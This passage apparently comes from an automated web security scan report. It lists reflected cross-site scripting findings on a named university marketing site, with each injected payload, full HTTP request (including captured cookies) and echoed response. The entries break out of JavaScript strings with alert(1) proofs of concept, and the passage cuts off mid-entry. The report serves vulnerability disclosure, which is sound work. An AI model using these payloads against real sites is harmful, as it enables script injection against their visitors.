Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:39 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:39 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:39 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44232

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
&postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dirbe4b9";alert(1)//0a352431f30&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&
...[SNIP]...

5.200. http://www.aptm.phoenix.edu/ [user1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the user1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0112"%3balert(1)//a96fd83d2c4 was submitted in the user1 parameter. This input was echoed as f0112";alert(1)//a96fd83d2c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112"%3balert(1)//a96fd83d2c4&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:50:51 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134479311.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:58 GMT; Path=/
Set-Cookie: vid=51922259; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:58 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:58 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:58 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44232

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
redit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112";alert(1)//a96fd83d2c4&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602D1FF1E5348");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect href
    * 2 - has p
...[SNIP]...

5.201. http://www.aptm.phoenix.edu/ [user2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the user2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6d2a"%3balert(1)//193f4f335e was submitted in the user2 parameter. This input was echoed as b6d2a";alert(1)//193f4f335e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a"%3balert(1)//193f4f335e&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:51:12 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48598; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135048548.5; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:19 GMT; Path=/
Set-Cookie: vid=51922307; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:19 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:19 GMT; Path=/
Set-Cookie: plid=48598; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:05:19 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44086

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
litary=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a";alert(1)//193f4f335e&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect href
    * 2 - has popped up?
    */

   var an_a
...[SNIP]...

5.202. http://www.aptm.phoenix.edu/ [user3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the user3 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6707"%3balert(1)//1e6342d0321 was submitted in the user3 parameter. This input was echoed as f6707";alert(1)//1e6342d0321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1f6707"%3balert(1)//1e6342d0321&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:48:15 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809464.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:22 GMT; Path=/
Set-Cookie: vid=51921869; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:22 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:22 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:22 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1f6707";alert(1)//1e6342d0321&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
    * 1 - redirect href
    * 2 - has popped up?
    */

   var an_arruids = n
...[SNIP]...

5.203. http://www.aptm.phoenix.edu/ [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d898f"%3balert(1)//925ecac98bf was submitted in the version parameter. This input was echoed as d898f";alert(1)//925ecac98bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90d898f"%3balert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:33 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134478364.3; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:40 GMT; Path=/
Set-Cookie: vid=51922053; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:40 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:40 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:40 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44232

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90d898f";alert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=D55602D1FF1E5348");
   
       setAllowDestURLOnSubmit(tr
...[SNIP]...

5.204. http://www.aptm.phoenix.edu/AptiNet/hhs [level_education parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The value of the level_education request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 137ab"%3balert(1)//63ddfe10507a70ca9 was submitted in the level_education parameter. This input was echoed as 137ab";alert(1)//63ddfe10507a70ca9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-&postal_code_int=&postal_code=&program_type=&program_type2=1&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-137ab"%3balert(1)//63ddfe10507a70ca9&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:59:55 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:14:02 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:14:02 GMT; Path=/
Set-Cookie: vid=51922123; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60205

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
el_education|36214_7718_98_95|143206",143060);doDynamicSelect("level_education|36214_7718_98_95|143206|REQUIRED", doDriveWithBrowserCachedValues("level_education|36214_7718_98_95|143206|REQUIRED", "-X-137ab";alert(1)//63ddfe10507a70ca9"),true,"","state|36214_7718_98_95|143098","program_type|36214_7718_98_95|143100","program_type2|36214_7718_98_95|143208","registered_nurse|36214_7718_98_95|143180",143060);doDynamicSelect("program_typ
...[SNIP]...

5.205. http://www.aptm.phoenix.edu/AptiNet/hhs [program_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The value of the program_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 824bc"%3balert(1)//faa69d1e4cac8c868 was submitted in the program_type parameter. This input was echoed as 824bc";alert(1)//faa69d1e4cac8c868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-&postal_code_int=&postal_code=&program_type=824bc"%3balert(1)//faa69d1e4cac8c868&program_type2=1&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:58:34 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:12:41 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:12:41 GMT; Path=/
Set-Cookie: vid=51922123; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60235

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
documentmultipageformat = 'MULTIPAGEFORMAT=Y';
       doDynamicSelect("program_type|36214_7718_98_95|143100|OPTIONAL", doDriveWithBrowserCachedValues("program_type|36214_7718_98_95|143100|OPTIONAL", "824bc";alert(1)//faa69d1e4cac8c868"),true,"","state|36214_7718_98_95|143098","program_type2|36214_7718_98_95|143208","registered_nurse|36214_7718_98_95|143180","level_education|36214_7718_98_95|143206",143060);doDynamicSelect("level_ed
...[SNIP]...

5.206. http://www.aptm.phoenix.edu/AptiNet/hhs [program_type2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The value of the program_type2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5d8f"%3balert(1)//b75aa6850b1597960 was submitted in the program_type2 parameter. This input was echoed as c5d8f";alert(1)//b75aa6850b1597960 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-&postal_code_int=&postal_code=&program_type=&program_type2=1c5d8f"%3balert(1)//b75aa6850b1597960&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:58:59 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:13:06 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:13:06 GMT; Path=/
Set-Cookie: vid=51922123; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60140

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
,"registered_nurse|36214_7718_98_95|143180",143060);doDynamicSelect("program_type2|36214_7718_98_95|143208|REQUIRED", doDriveWithBrowserCachedValues("program_type2|36214_7718_98_95|143208|REQUIRED", "1c5d8f";alert(1)//b75aa6850b1597960"),true,"","state|36214_7718_98_95|143098","program_type|36214_7718_98_95|143100","registered_nurse|36214_7718_98_95|143180","level_education|36214_7718_98_95|143206",143060);doDynamicSelect("registere
...[SNIP]...

5.207. http://www.aptm.phoenix.edu/AptiNet/hhs [registered_nurse parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The value of the registered_nurse request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e90f"%3balert(1)//35db81cf6d89d4995 was submitted in the registered_nurse parameter. This input was echoed as 2e90f";alert(1)//35db81cf6d89d4995 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

